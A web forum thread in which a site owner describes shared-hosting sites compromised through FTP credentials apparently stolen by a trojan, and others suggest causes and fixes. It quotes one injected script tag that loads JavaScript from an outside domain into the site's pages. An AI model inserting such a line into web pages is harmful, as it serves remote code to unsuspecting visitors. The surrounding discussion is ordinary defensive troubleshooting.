Is this coincidence or will it have something to do with my comp? They are both shared hosting accounts, the first is ixwebhosting the second is hostgator. But they have been hacked in different ways the hostgator account has had my ads replaced by google ads and has actually moved entire sites into different directories in my account whilst the other keeps calling scripts from other sites. Im going to name and shame them here. http://www.4ura.com http://www.v48.org Im not sure what the javascript does maybe one of you could tell me. These pieces of code are in different places. <script type='text/javascript' src='http://4ura.net/js_new.js'></script> I cant find where v48 has hidden there script but when you load the page you can see it calling the domain. This is on over 15 domains I have hosted their. Basically I want to know what to do to prevent this again. Is it a common problem with shared hosting or is it something gathering info from my laptop. I have contacted the hosting accounts asking for backups but what steps should I take to ensure it does'nt happen again? All help is appreciated. Thank you.
I think you will first have to determine HOW did that happen, so you could get to the point to ask how to prevent that from happening again. My best guess are two things: 1. Someone - somehow found out your passwords, logged in and made those changes (in this case you could ask your hosting provider if they can provide you with last ftp logins to your account/accounts). If this is the case, you will probably want to check your computer for trojans and change passwords for all your sites 2. You were using some free scripts (possible some older version that has some bugs) where someone found some security holes and managed to exploit those holes. In this case, you will probably want to upgrade your software to latest versions and take some steps to secure those accounts more, if possible. Since those two companies are big and well known, I doubt someone from their end did that. Also, since you have more then 15 sites hosted and just one was hacked, then it wasn't server-wide hack attempt, or account-wide hack attempt, since it was only 1 site affected there. just sharing my thoughts
As pr0t0n said, since multiple sites got hacked at once, do a virus/Trojan/spyware scan on your PC. There are some that are increasingly active at the moment that search the PC for FTP logins and send them to a remote server. If there's no problem on the PC, consider whatever things the sites have in common. Do you use the same versions of the same third party scripts? Did you write your own PHP code and use it on all the sites? Either way, inform the webhosts what happened so they can check their servers, too.
OK the trojan I found was called PWS Banker Ive read about it and im 90% sure its that. I ran the program so has it embedded itself on my computer? Because the virus scan only picks up the original file. I don't want to change passwords until I know its gone So what next?
Yes McAfee antivirus it found quarantined and delted it but the problem is It was only the original file it found and deleted I bet its still in my registry keys Im going to format my laptop if I cant sort it out because its a pretty nasty trojan. The pronlem Im finding now is with the sites, I have reinstated backups for all my sites apart from one. Because I would lose quite a bit of work but the trouble is its a joomla site so theres hundreds of possibilities where they are calling the sites from. After about 20 minutes of looking I noticed that 4ura.com embeds itself in all index. files but in joomla there is one in every directory I have removed all these yet it is still calling the 2 sites is it possible they could be calling from the sql servers?
this also happened to me a few weeks back, have you set the permissions correctly for writing to files? I changed mine and have had no bother since.